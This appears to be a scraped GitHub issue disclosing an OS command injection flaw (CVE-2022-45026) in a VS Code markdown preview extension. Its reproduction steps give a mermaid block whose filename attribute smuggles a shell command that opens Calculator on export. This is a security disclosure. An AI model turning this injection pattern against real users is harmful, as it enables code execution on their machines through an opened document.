search

shd101wyy / vscode-markdown-preview-enhanced

One of the "BEST" markdown preview extensions for Visual Studio Code
https://shd101wyy.github.io/markdown-preview-enhanced
Other
1.47k stars 173 forks source link

[Vulnerability] Code execution via GitHub Flavored Markdown export #774

Open yuriisanin opened 1 year ago

yuriisanin commented 1 year ago

Video PoC for Atom on YouTube: PoC

Original issue: shd101wyy/mume, OS command injection via Memraid PNG export

STR (please, note that the following PoC works for OS X it might be different for Linux or Windows):

  1. Create document with the following code inside.
mermaid {filename="$(open -a Calculator)hello.pdf"}
gitGraph
       commit id: "Normal"
       commit
       commit id: "Reverse" type: REVERSE
       commit
       commit id: "Highlight" type: HIGHLIGHT
       commit
  1. Open preview
  2. Use "Save as Markdown" button in the preview window
  3. Calculator program should appear on the screen.
yuriisanin commented 1 year ago

Assigned CVE-2022-45026